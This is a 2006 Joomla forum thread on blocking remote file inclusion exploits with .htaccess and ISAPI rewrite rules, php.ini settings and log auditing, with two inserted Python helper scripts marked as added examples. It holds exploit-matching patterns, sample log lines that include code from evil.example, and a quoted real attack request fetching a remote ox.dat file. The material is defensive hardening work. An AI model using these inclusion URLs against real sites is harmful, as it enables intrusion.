Joomla! Discussion Forums



Post new topic Reply to topic  [ 235 posts ]  Go to page Previous  1, 2, 3, 4, 5, 6, 7, 8  Next
Posted: Sun Jul 23, 2006 4:37 am 
Joomla! Enthusiast

Joined: Sat Sep 24, 2005 5:47 pm
Posts: 221
RobS wrote:
While we are on that subject, in case you don't know, many components have folders in the /path/to/joomla/components/ directory and /path/to/joomla/administrator/components/.  It is possible for components that suffer from this type of vulnerability to be exploited through the back-end so make sure you drop a php.ini file in those directories as well.



Do you mean to drop one in every subfolder? There are many folders, can it just be dropped in the components folders of admin and Joomla components?


BTW, can I toss out tinymce? I have JCE and I prefer not having to upload tinymce again as it is a pain in Joomla installs and patches.


TIA


Posted: Sun Jul 23, 2006 7:14 pm 
Joomla! Intern

Joined: Sun Sep 11, 2005 12:59 am
Posts: 81
josoroma wrote:
# Possible attacks
cat /var/log/httpd/access_log* | egrep -i -f patterns.txt | sort | uniq

# Unique quantity of IPs (sort before uniq: uniq only collapses adjacent duplicates)
cat /var/log/httpd/access_log* | egrep -i -f patterns.txt | awk '{print $1}' | sort | uniq | wc -l

# IP:
cat /var/log/httpd/access_log* | egrep -i -f patterns.txt | awk '{print $1}' | sort | uniq

# URL:
cat /var/log/httpd/access_log* | egrep -i -f patterns.txt | awk '{print $7}' | sort | uniq

# IP and URL:
cat /var/log/httpd/access_log* | egrep -i -f patterns.txt | awk '{print "[", $1, "]", $7}' | sort | uniq

# Who:
cat /var/log/httpd/access_log* | egrep -i -f patterns.txt | awk '{print $1}' | sort | uniq | xargs -n 1 host



I was thinking of some kind of shell script using cron (each hour) to send an email to the administrator if "wc -l" > 1 and if the log date line is equal to today. Any help is welcome with the construction of this script.

#1
I know about acces log, which other log files need to be audited?

#2
Which will be the future of joomla 1.0x security fixes after the launch of joomla 1.5?

Thanx.

_________________
----------------------------------------
Josoroma



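The hourly cron check josoroma asks for above, as an added example that is not part of the thread and not josoroma's or Rob's code. It keeps the `egrep -i -f patterns.txt` semantics (one case-insensitive regex per line of the patterns file) and the same views the awk pipelines produce (unique IPs, URLs, IP/URL pairs), but only counts lines carrying today's date stamp and alerts on any hit. The log path, patterns file, SMTP host and recipient are placeholder assumptions; the log lines at the bottom are constructed sample data, not real traffic.

```python
# Added example, not code from the thread: hourly Apache log audit that
# reports only today's lines matching a pattern list and mails the admin.
import datetime
import glob
import re
import smtplib
from email.message import EmailMessage

# Placeholder settings (assumptions, not values from the thread).
LOG_GLOB = "/var/log/httpd/access_log*"
PATTERNS_FILE = "/etc/joomla-audit/patterns.txt"
ALERT_TO = None           # e.g. "admin@example.com"; None prints the report instead
SMTP_HOST = "localhost"

# Common/combined log format: client IP first, [dd/Mon/yyyy:HH:MM:SS zone],
# then the quoted request line and the status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<day>\d{2}/\w{3}/\d{4}):[^\]]*\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)


def load_patterns(lines):
    """One case-insensitive regex per non-empty line, like `egrep -i -f`."""
    return [re.compile(p.strip(), re.IGNORECASE) for p in lines if p.strip()]


def scan(log_lines, patterns, day):
    """(ip, url, status) for every line stamped `day` that matches a pattern."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if m and m.group("day") == day and any(p.search(line) for p in patterns):
            hits.append((m.group("ip"), m.group("url"), m.group("status")))
    return hits


def summarize(hits):
    """The same views as the awk pipelines: unique IPs, URLs and IP/URL pairs."""
    return {
        "count": len(hits),
        "ips": sorted({h[0] for h in hits}),
        "urls": sorted({h[1] for h in hits}),
        "pairs": sorted({(h[0], h[1]) for h in hits}),
    }


def build_report(summary):
    lines = ["%d suspicious request(s) today" % summary["count"], "", "Sources:"]
    lines += ["  %s" % ip for ip in summary["ips"]]
    lines += ["", "Requests:"]
    lines += ["  [%s] %s" % pair for pair in summary["pairs"]]
    return "\n".join(lines)


def run_once(log_glob=LOG_GLOB, patterns_file=PATTERNS_FILE, today=None):
    """Cron entry point: scan every matching log file, alert only on hits."""
    today = today or datetime.date.today().strftime("%d/%b/%Y")
    with open(patterns_file) as f:
        patterns = load_patterns(f)
    lines = []
    for path in glob.glob(log_glob):
        with open(path, errors="replace") as f:
            lines.extend(f)
    summary = summarize(scan(lines, patterns, today))
    if summary["count"]:
        report = build_report(summary)
        if ALERT_TO:
            msg = EmailMessage()
            msg["Subject"] = "Joomla: %d exploit attempts today" % summary["count"]
            msg["From"] = msg["To"] = ALERT_TO
            msg.set_content(report)
            with smtplib.SMTP(SMTP_HOST) as s:
                s.send_message(msg)
        else:
            print(report)
    return summary


# Constructed sample input standing in for access_log and patterns.txt.
SAMPLE_PATTERNS = ["mosConfig_absolute_path=", "phpbb_root_path=", "base64_encode"]
SAMPLE_LOG = [
    '10.0.0.1 - - [23/Jul/2006:10:00:01 +0000] "GET /index.php?option=com_content HTTP/1.1" 200 1234',
    '10.0.0.2 - - [23/Jul/2006:10:05:12 +0000] "GET /components/com_forum/download.php?phpbb_root_path=http://evil.example/c.txt? HTTP/1.1" 200 42',
    '10.0.0.2 - - [23/Jul/2006:10:05:15 +0000] "GET /index.php?mosConfig_absolute_path=http://evil.example/c.txt? HTTP/1.1" 403 118',
    '10.0.0.3 - - [22/Jul/2006:23:59:59 +0000] "GET /index.php?MOSCONFIG_absolute_path=http://evil.example/c.txt? HTTP/1.1" 403 118',
]

if __name__ == "__main__":
    hits = scan(SAMPLE_LOG, load_patterns(SAMPLE_PATTERNS), "23/Jul/2006")
    print(build_report(summarize(hits)))
```

Set ALERT_TO and install it with a crontab line such as `0 * * * * /usr/bin/python3 /usr/local/sbin/joomla_log_audit.py` (path assumed). Matching on the raw line rather than on the URL alone means a pattern like `libwww-perl` in patterns.txt also catches the user-agent, which the egrep pipelines above already allow for.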
Posted: Sun Jul 23, 2006 7:23 pm 
Joomla! Ace

Joined: Mon Dec 05, 2005 10:17 am
Posts: 1318
Location: New Orleans, LA, USA
Joomla 1.0.x is going to continue to be maintained for a so far undecided amount of time, approximately 6 months to 1 year.  This should give everyone an adequate amount of time to get their add-ons etc. ready for 1.5 if they haven't done so already.

_________________
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions


Posted: Mon Jul 24, 2006 8:43 pm 
Joomla! Explorer

Joined: Sat Sep 03, 2005 1:56 am
Posts: 326
Location: Upstate New York
Is there a way to set my htaccess template globally or do I have to go into EVERY directory and change each htaccess file to include this code?

_________________
Thanks!
Aaron


Posted: Mon Jul 24, 2006 10:48 pm 
Joomla! Ace

Joined: Mon Dec 05, 2005 10:17 am
Posts: 1318
Location: New Orleans, LA, USA
.htaccess files work recursively.  Anything included in an .htaccess file in your public html folder will apply to all subfolders as well.

_________________
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions


Posted: Tue Jul 25, 2006 3:48 pm 
Joomla! Apprentice

Joined: Wed Jan 04, 2006 10:02 pm
Posts: 25
HELP...!

I've put in RobS's suggested .htaccess file, and it seems to work fine.

However, the login module no longer works. I get the 403 Forbidden when I try to login.

I don't see anything in comprofile.php relative to login that would trigger the 403, so I wonder what could be the problem?

Thanks
Ricardo


Posted: Tue Jul 25, 2006 3:52 pm 
Joomla! Ace

Joined: Mon Dec 05, 2005 10:17 am
Posts: 1318
Location: New Orleans, LA, USA
Oh, that is the first report I have heard of something breaking.  The way to figure it out I suppose would be to go through one at a time and comment out each line that starts with 'RewriteCond' in the list of rules I gave.  Just put a '#' as the first character of the line.  Once you figure out which Rewrite Condition is causing the problem let me know and we will go from there.

_________________
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions


Posted: Tue Jul 25, 2006 4:06 pm 
Joomla! Apprentice

Joined: Wed Jan 04, 2006 10:02 pm
Posts: 25
This is crazy...  ???

I've removed my .htaccess file and I'm still getting the 403 !!!  How can that be?  :'(

A login attempt sends me to /index.php with a 403 error. I can't figure out how this is happening.

I don't have any rewrite rules in the apache config file. I've removed the .htaccess file.

???  ???  ???


Posted: Tue Jul 25, 2006 4:13 pm 
Joomla! Ace

Joined: Mon Dec 05, 2005 10:17 am
Posts: 1318
Location: New Orleans, LA, USA
I suggest you contact your hosting provider.  They should be able to quickly diagnose and solve that.

_________________
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions


Posted: Tue Jul 25, 2006 4:50 pm 
Joomla! Apprentice

Joined: Wed Jan 04, 2006 10:02 pm
Posts: 25
I am the one diagnosing it...  :(

I am in control of apache. I see in the access log

POST /index.php?option=com_comprofiler&task=loing HTTP/1.1" 200 42111
POST /index.php HTTP/1.1" 403 118

But the .htaccess isn't there!

I thought perhaps this is some crazy NFS issue, since the server has NFS mounted. But logged in, the .htaccess file isn't there. I've restarted apache twice already thinking maybe it had something cached. I've unmounted and re-mounted the nfs partition and I restarted the nfs server.

But I still get the error.

I don't understand what could possibly be wrong.  How can I trace this 403 error?

I put some debug into the main index.php to try and see what's going on, and it seems the 403 is coming from

$mainframe->login();

because if I put an alert prior to that call, I see it. If I put an alert after that call, I get the 403


Posted: Tue Jul 25, 2006 5:10 pm 
Joomla! Ace

Joined: Mon Dec 05, 2005 10:17 am
Posts: 1318
Location: New Orleans, LA, USA
go to your htdocs folder or wherever your configuration.php file is and do this.

# find . -name ".htaccess" -print

If there is an .htaccess around that is causing problems that will show you where it is. 

_________________
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions


Posted: Tue Jul 25, 2006 5:21 pm 
Joomla! Apprentice

Joined: Wed Jan 04, 2006 10:02 pm
Posts: 25
Nope,

I found the problem, although I'm not sure what the best solution is.

In includes/joomla.php there are 2 functions:

josSpoofCheck and josSpoofValue

josSpoofCheck calls josSpoofValue that validates a certain parameter. The $validate in josSpoofValue is a hash of a value, and it is a non-zero value. However, when it returns the $validate variable to josSpoofCheck, that value is getting clobbered somehow, and is returned as a 0 to josSpoofCheck. That forces an immediate call to

header('HTTP/1.0 403 Forbidden');

If I take the if block that checks $validate and put it at the end of josSpoofValue, then all works fine. If I put it back inside josSpoofCheck, then the login doesn't work because the $validate value somehow gets set to 0. I don't understand how, it's simply being returned in the stack and I checked its value immediately prior to the return.

Sounds like some sort of bug with PHP...?


Posted: Wed Jul 26, 2006 12:54 am 
Joomla! Apprentice

Joined: Sun Oct 23, 2005 6:29 pm
Posts: 6
infograf768 wrote:
@vscribe

error in your text
It is:
RewriteRule ^(.*)$ index.php [F,L]



Is this instead of the following line already there?

RewriteRule ^(.*) index.php


Posted: Fri Jul 28, 2006 6:06 pm 
Joomla! Enthusiast

Joined: Wed Aug 31, 2005 3:51 pm
Posts: 211
Location: Copenhagen, Denmark
Like krbmedia I'm struggling a bit with these .htaccess rules as well.

Is it possible to define several RewriteRule's in the file, like this?
Code:
# Rule
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*) index.php

# extra rule
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
RewriteRule ^(.*)$ index.php [F,L]


Secondly, if I want to block out any URL/link to my site containing "phpbb_root_path=" then how do I go about that?
I have tried to add this condition, but it does not seem to have any effect at all.

Code:
RewriteCond %{QUERY_STRING} phpbb_root_path(=|\%3D|%[0-9A-Z]{0,2}) [OR]

The idea with the above would be that links like this
http://site.com/components/com_forum/fo ... _path=test
would go to 403 Forbidden.


Currently my .htaccess file looks like this
Code:
##
# @version $Id: htaccess.txt,v 1.5 2005/01/22 23:00:27 spacemonkey Exp $
# @package Mambo
# @copyright (C) 2000 - 2005 Miro International Pty Ltd
# @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
# Mambo is Free Software
##

#
#  mod_rewrite in use
#

RewriteEngine On

#  Uncomment following line if your webserver's URL
#  is not directly related to physical file paths.
#  Update YourMamboDirectory (just / for root)

# RewriteBase /YourMamboDirectory

#
#  Rules
#
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d

RewriteRule ^(.*) index.php


########## Begin - Rewrite rules to block out some common exploits
#                             
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script that tries to set CONFIG_EXT (com_extcal2 issue)
RewriteCond %{QUERY_STRING} CONFIG_EXT(\[|\%20|\%5B).*= [NC,OR]
# Block out any script that tries to set sbp or sb_authorname via URL (simpleboard) 
RewriteCond %{QUERY_STRING} sbp(=|\%20|\%3D) [OR]
RewriteCond %{QUERY_STRING} sb_authorname(=|\%20|\%3D)    
#
#
# Block phpbb component exploit
RewriteCond %{QUERY_STRING} phpbb_root_path(=|\%3D|%[0-9A-Z]{0,2}) [OR]
#
#
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
#
########## End - Rewrite rules to block out some common exploits



# $Id: htaccess addition v 0.001 Marcus W $
#
# htaccess file for handling big files in Mambo
#
# @ Released under any license...
# @version $Revision: 0.001 $
#
# More Rules
#
php_value max_execution_time 3000
php_value upload_max_filesize 32M
php_value post_max_size 32M
php_value memory_limit 32M

php_value register_globals off


But I have not been able to verify if the latter part of the rewrite rules actually works as intended. So far it seems to me like they have no effect.

If I remove the first rewrite condition and rule then any pages in sections or categories do not load; instead I get a 404 error. So I'm guessing they should stay there.

Well, any general comments on the .htaccess syntax in terms of how to add several rules would be helpful, and hints on how to block URLs like something.php?phpbb_root_path=something_else.txt would be greatly appreciated.
- Chr


Posted: Fri Jul 28, 2006 6:15 pm 
Joomla! Enthusiast

Joined: Wed Aug 31, 2005 3:51 pm
Posts: 211
Location: Copenhagen, Denmark
Aha - now I got it.  The last [OR] was in the wrong position, so moving it upwards to the 2nd last line solved my problem, like so:

Code:
...
RewriteCond %{QUERY_STRING} sbp(=|\%20|\%3D) [OR]
RewriteCond %{QUERY_STRING} sb_authorname(=|\%20|\%3D)  [OR]
#
# Block phpbb component exploit
RewriteCond %{QUERY_STRING} phpbb_root_path(=|\%3D|%[0-9A-Z]{0,2})
#
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
#
########## End - Rewrite rules to block out some common exploits


Posted: Sat Jul 29, 2006 3:08 am 
Joomla! Fledgling

Joined: Sun Jan 08, 2006 9:21 pm
Posts: 2
Here is something I picked up on the topic,

Stopping bad bots raiding your website has become an issue. Bad bots ignore your robots.txt rules, can greatly increase your bandwidth usage, throw your stats into confusion and often harvest email addresses. By uploading an .htaccess file with the following contents you can stop named bots from accessing your website. Add further names if required. Note: 208.66.195.0-28 refers to the Moscow-based Psychelone agent that has recently appeared and that does not always disclose its identity...


SetEnvIfNoCase User-agent "Arellis" spammer=yes
SetEnvIfNoCase User-agent "Indy Library" spammer=yes
SetEnvIfNoCase User-agent "psycheclone" spammer=yes
SetEnvIfNoCase User-agent "Xenu_Link_Sleuth" spammer=yes
SetEnvIfNoCase User-agent "Zeus_" spammer=yes

Order allow,deny
deny from env=spammer
allow from all

deny from 208.66.195.0/28

Only the directives can live between the tags; anything you want to block must live below the end tag, it seems.



Posted: Mon Jul 31, 2006 12:52 pm 
Joomla! Guru

Joined: Wed Aug 17, 2005 11:26 pm
Posts: 869
dweeble wrote:
Note: 208.66.195.0-28 refers to the Moscow-based Psychelone agent that has recently appeared and that does not always disclose its identity...


"psycheclone" has appeared on a number of sites, coincidentally just before those sites were hacked.
Due to the very large number of "coincidences" a number of hosts are now blocking this bot at firewall level from their servers.

I strongly recommend that everyone adds the following to their .htaccess file to keep that bot out. It has no legitimate purpose and although nobody seems to have proof that it is related to exploits, it does appear to deep-scan sites not long before sites are hit.

@dweeble - you give one IP for this bot, but it changes IPs frequently and often within the one session.

This is the IP block to block in .htaccess:
Code:
deny from 208.66.195.0/28


Remember, an error in your .htaccess file can make your server space inaccessible to even you! Also note that every directive you add to .htaccess increases server load and may decrease your site's performance.

_________________
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info


Posted: Thu Aug 03, 2006 5:02 am 
Joomla! Apprentice

Joined: Tue Aug 01, 2006 4:28 am
Posts: 49
If I contact my webhost (1and1) and they turn off RG, server wide, do I still need to use this code in my .htaccess file?

Code:
########## Begin - Rewrite rules to block out some common exploits
#                             
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
#
########## End - Rewrite rules to block out some common exploits

_________________
www.hdtvinnovations.com - HDTV Innovations, your ultimate HDTV headquarters.

"I like mornings .. I just wish they were later in the day" - Me.
"'Techmology' what is it all about" - Ali G.


Posted: Thu Aug 03, 2006 6:32 am 
Joomla! Apprentice

Joined: Tue Aug 01, 2006 4:28 am
Posts: 49
Ok, I checked with 1and1. My "Server API" is "CGI", and register globals are on.

I changed:

Code:
/**
* Use 1 to emulate register_globals = on
*
* Use 0 to emulate regsiter_globals = off
*/
define( 'RG_EMULATION', 1 );


To:

Code:
/**
* Use 1 to emulate register_globals = on
*
* Use 0 to emulate regsiter_globals = off
*/
define( 'RG_EMULATION', 0 );


But it did not affect the RG; it is still turned on. I have also tried using a "php.ini" file, but it had no effect, with the coding:

Code:
-------------snip-------------
; php.ini takes "name = value" lines; the php_value form is .htaccess syntax
register_globals = Off
disable_functions = show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open
-------------snap-------------


Any thoughts or suggestions would be greatly appreciated. I am trying to set up an e-commerce website, so I need to make sure I get my site as secure as possible.

Here are my server stats:
I am using PHP 4.4.2.
My web server is Apache/1.3.37 (Unix). Note that I am on a shared hosting package, I do not have a dedicated server.
My WebServer to PHP interface is CGI.

Thanks, Brandon.

_________________
www.hdtvinnovations.com - HDTV Innovations, your ultimate HDTV headquarters.

"I like mornings .. I just wish they were later in the day" - Me.
"'Techmology' what is it all about" - Ali G.



Posted: Thu Aug 03, 2006 7:07 am 
Joomla! Guru

Joined: Wed Aug 17, 2005 11:26 pm
Posts: 869
Hi Brandon,
Hosts set up servers differently.  .htaccess will not work for you as your server is running PHP under cgi. php.ini *should* work, but again this is dependent on how your host has set up the server.  You will need to contact your host, tell them you want register_globals off and ask them to do it. If they won't do it server-wide, then ask them to give you the appropriate settings for a php.ini.  If they won't allow you to set register_globals off for your own site then you might like to consider changing hosts.

_________________
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info


Posted: Thu Aug 03, 2006 12:08 pm 
Joomla! Fledgling

Joined: Wed Aug 02, 2006 12:27 pm
Posts: 2
RobS wrote:
I take it you are using IIS?  The script has had 0 testing with IIS and I am not even sure IIS has a mod_rewrite clone.  As far as I am aware, you cannot use either SEF or those mod_rewrite rules for your website.

Use ISAPI_Rewrite for IIS, for example with rules like:
Code:
[ISAPI_Rewrite]
# XSS exploits
#
# http://www.milw0rm.com/exploits/1981
RewriteRule .*(?:mosConfig_absolute_path\=http(\://|%3A%2F%2F).*cmd\.(txt|gif)).* / [F,I,L]
# http://milw0rm.com/exploits/1994
RewriteRule .*(?:com_simpleboard\/image_upload\.php\?sbp\=http(\://|%3A%2F%2F).*cmd\.(txt|gif)).* / [F,I,L]
# http://www.milw0rm.com/exploits/1995
RewriteRule .*(?:com_forum\/download\.php\?phpbb_root_path\=).* / [F,I,L]
# http://www.milw0rm.com/exploits/1723
RewriteRule .*(?:\/admin\/addentry\.php\?phpbb_root_path\=http(\://|%3A%2F%2F).*\?).* / [F,I,L]
# http://www.milw0rm.com/exploits/1808
RewriteRule .*(?:\?ROOT_PATH=http(\://|%3A%2F%2F).*cmd\.(txt|gif)).* / [F,I,L]
# http://www.milw0rm.org/exploits/2085
RewriteRule .*(?:com_colophon\/admin\.colophon\.php\?mosConfig_absolute_path\=http(\://|%3A%2F%2F)).* / [F,I,L]
# http://www.milw0rm.org/exploits/2086
RewriteRule .*(?:com_mambatstaff\/mambatstaff\.php\?mosConfig_absolute_path\=http(\://|%3A%2F%2F)).* / [F,I,L]
# http://www.milw0rm.org/exploits/2089
RewriteRule .*(?:com_uhp\/(uhp_config\.php|footer\.php|functions\.php|install\.uhp\.php|toolbar\.uhp\.html\.php|uhp\.class\.php|uninstall\.uhp\.php)\?mosConfig_absolute_path\=http(\://|%3A%2F%2F)).* / [F,I,L]
# smf.php exploit
RewriteRule .*(?:com_smf\/smf\.php\?mosConfig_absolute_path\=http(\://|%3A%2F%2F)).* / [F,I,L]


It is not perfect, rules can be rewritten to be shorter and/or to block more, but it works. The only disadvantage is that the 'F' (Forbidden) flag returns a 404 File Not Found, not a 403 Access Forbidden.


Posted: Thu Aug 03, 2006 5:36 pm 
Joomla! Apprentice

Joined: Tue Aug 01, 2006 4:28 am
Posts: 49
Elpie wrote:
Hi Brandon,
Hosts set up servers differently.  .htaccess will not work for you as your server is running PHP under cgi. php.ini *should* work, but again this is dependent on how your host has set up the server.  You will need to contact your host, tell them you want register_globals off and ask them to do it. If they won't do it server-wide, then ask them to give you the appropriate settings for a php.ini.  If they won't allow you to set register_globals off for your own site then you might like to consider changing hosts.


Hey Elpie, thanks for the quick response.

Ok, I will contact them again. I asked them to turn them off last time I was talking to them, but all they did was send me information about how to view my PHP stats. So if they will not, and I can't, are you familiar with a webhost that I can turn off RGs with? Also, since you're suggesting that I switch webhosts if they won't turn off registered globals, I assume that it is very important to turn them off?

Brandon.

_________________
www.hdtvinnovations.com - HDTV Innovations, your ultimate HDTV headquarters.

"I like mornings .. I just wish they were later in the day" - Me.
"'Techmology' what is it all about" - Ali G.


Posted: Sat Aug 05, 2006 1:24 am 
Joomla! Ace

Joined: Fri Aug 19, 2005 2:26 am
Posts: 1802
Location: Lancaster, Lancashire, United Kingdom
Brandon,

For the change to work with 1and1 they require the php.ini to be in each and every folder that has executable scripts in it; the settings don't cascade or inherit. I discovered this when I set register globals off in the Joomla folder but the system info in the /administrator/ section stubbornly refused to be disabled.

Dean

_________________
Dean Marshall - Mambo and Joomla Consultant
Dean Marshall Consultancy Limited - http://www.deanmarshall.co.uk/


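Following Dean's observation, and Rob's earlier advice in this thread to cover components/ and administrator/components/ as well, here is an added example (not code from the thread, from Joomla or from 1and1) that drops a php.ini into every directory of a site tree that holds PHP scripts, skipping directories with only images or text and leaving files that are already correct untouched so it can be re-run after each update. The ini contents and the sample tree are illustrative assumptions; which directives a host honours in a per-directory php.ini under CGI has to come from that host's documentation.

```python
# Added example, not code from the thread: put a php.ini into every directory
# of a Joomla tree that holds PHP scripts, for PHP-as-CGI hosts whose
# per-directory php.ini does not inherit (the 1and1 behaviour above).
import os
import tempfile

# php.ini syntax; `php_value ...` lines belong in .htaccess and do nothing here.
# The settings are illustrative; use the ones the host documents.
PHP_INI = """\
; per-directory settings for a PHP-as-CGI host
register_globals = Off
disable_functions = show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open
"""


def script_dirs(root, ext=".php"):
    """Every directory under `root` (root included) that contains a PHP file,
    as paths relative to `root`, sorted."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        if any(name.lower().endswith(ext) for name in files):
            found.append(os.path.relpath(dirpath, root))
    return sorted(found)


def read_php_ini(root, rel):
    """Content of root/rel/php.ini, or None if there is none."""
    target = os.path.join(root, rel, "php.ini")
    if not os.path.exists(target):
        return None
    with open(target) as f:
        return f.read()


def place_php_ini(root, content=PHP_INI, dry_run=False):
    """Write `content` as php.ini in each script directory.

    Returns (written, unchanged) lists of relative directories. Files that
    already hold exactly `content` are skipped, so the job can be re-run after
    every Joomla patch or component install without churn.
    """
    written, unchanged = [], []
    for rel in script_dirs(root):
        if read_php_ini(root, rel) == content:
            unchanged.append(rel)
            continue
        if not dry_run:
            with open(os.path.join(root, rel, "php.ini"), "w") as f:
                f.write(content)
        written.append(rel)
    return written, unchanged


def make_sample_tree():
    """Constructed stand-in for a Joomla install (not real Joomla files)."""
    base = tempfile.mkdtemp()
    layout = {
        "index.php": "<?php\n",
        "components/com_forum/download.php": "<?php\n",
        "administrator/components/com_uhp/uhp_config.php": "<?php\n",
        "images/logo.gif": "GIF89a",
        "media/readme.txt": "no scripts here\n",
    }
    for rel, body in layout.items():
        path = os.path.join(base, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as f:
            f.write(body)
    return base


if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    dry = "--write" not in sys.argv
    written, unchanged = place_php_ini(root, dry_run=dry)
    print("would write" if dry else "wrote", written)
    print("already in place", unchanged)
```

Run it once without `--write` to see the directory list, then with `--write` from the Joomla root; the same run against the tree after an update reports the new component directories under "would write" and everything else under "already in place".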
Posted: Sat Aug 05, 2006 11:57 am 
Joomla! Intern

Joined: Thu Jan 26, 2006 11:36 pm
Posts: 71
Location: Los Angeles, California, United States
Rob, I just want to say to you and all those contributing to this .htaccess protection measure, thank you very much.

This does so much in fending off potentially small and big exploits!  It is a great added line of defense, and I am highly appreciative of how targeted you have made the code so that it does not interfere with legitimate functionality as far as I can tell.

I've got a question though.  If I have a set of RewriteCond's and a RewriteRule already in my .htaccess file, will I just be able to append this block to the end of my file with no conflicts or inefficiencies from those other RewriteCond's and RewriteRule that are already there?

This is what I had at the end of my .htaccess file already:
Code:
########## Begin 3rd Party or Core SEF Section
#
RewriteCond %{REQUEST_URI} ^(/component/option,com) [NC,OR] ##optional - see notes##
RewriteCond %{REQUEST_URI} (/|\.htm|\.php|\.html|/[^.]*)$  [NC]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule (.*) index.php
#
########## End 3rd Party or Core SEF Section


I'm just curious if having two RewriteRule's might slow the server down when responding to some of the conditions.  Seems mine might be doing that for some induced 404 errors, but then again I haven't had much sleep lately ;)

_________________
-Tyler D.
Web Developer & Integrator: http://www.LasVegasExtremes.com



Posted: Sat Aug 05, 2006 6:09 pm 
Joomla! Ace

Joined: Mon Dec 05, 2005 10:17 am
Posts: 1318
Location: New Orleans, LA, USA
Tyler,

No, there shouldn't be any conflicts.  I know of many people using the rules I wrote and various SEF components which need the block of conditions you posted.  The only problem that could arise is from trying to use another RewriteRule that has an [L] tag in it while expecting another rule to be parsed.  The [L] tag specifies that mod_rewrite should stop checking rules after this rule (stands for Last) which my rule includes in order to force the 403 Forbidden error.  None of the SEF functions should use this tag so everything should be okay.  One thing that might be causing 404 errors for you is if you have that last rewrite rule block in your .htaccess file and you DO NOT have any SEF functionality enabled.  So, make sure you have SEF enabled in your site's core configuration or comment out those rules by placing a '#' sign at the beginning of the line.  Use the comments in that block as an example if you need clarification.

_________________
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions


Posted: Sat Aug 05, 2006 10:14 pm 
Joomla! Intern

Joined: Thu Jan 26, 2006 11:36 pm
Posts: 71
Location: Los Angeles, California, United States
Yeah, thx Rob... good explanations there :)

I'll be keeping SEF on the whole time, but I'll now know what to do if I disable it.

_________________
-Tyler D.
Web Developer & Integrator: http://www.LasVegasExtremes.com


Posted: Mon Aug 14, 2006 4:15 am 
Joomla! Intern

Joined: Thu Jan 26, 2006 11:36 pm
Posts: 71
Location: Los Angeles, California, United States
I saw a hack done where there seemed to be a GET request in the query string:

Here is the error log message;
Quote:
62.149.0.117 - - [14/Aug/2006:00:48:38 +0700] "GET /myweb/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://t3ch.addyour.net/ox.dat? HTTP/1.1" 404 266 "-" "libwww-perl/5.63"


I'm curious if this error log indicator above is a query string type of attack and I'm more interested if anyone can provide a suggested line for me to add to my existing version of the Joomla .htaccess (which also happens to be exactly the same as the recommended secured version that this thread discusses).

Would this be a good line for me to add in order to strengthen my security against that type of attack?:
Quote:
RewriteCond %{QUERY_STRING} GET and components or modules or mambots or templates [OR]


I realize the statement itself is probably wrong, but how should the .htaccess code look so that I rewrite any GET string that has any of those other terms with it (components or modules or mambots or templates)? 

This might not be candidate for the joomla recommended .htaccess cuz some people may have valid uses for such a query string, but I know that none of the URLs on my site will ever have GET in a query string with those other terms.

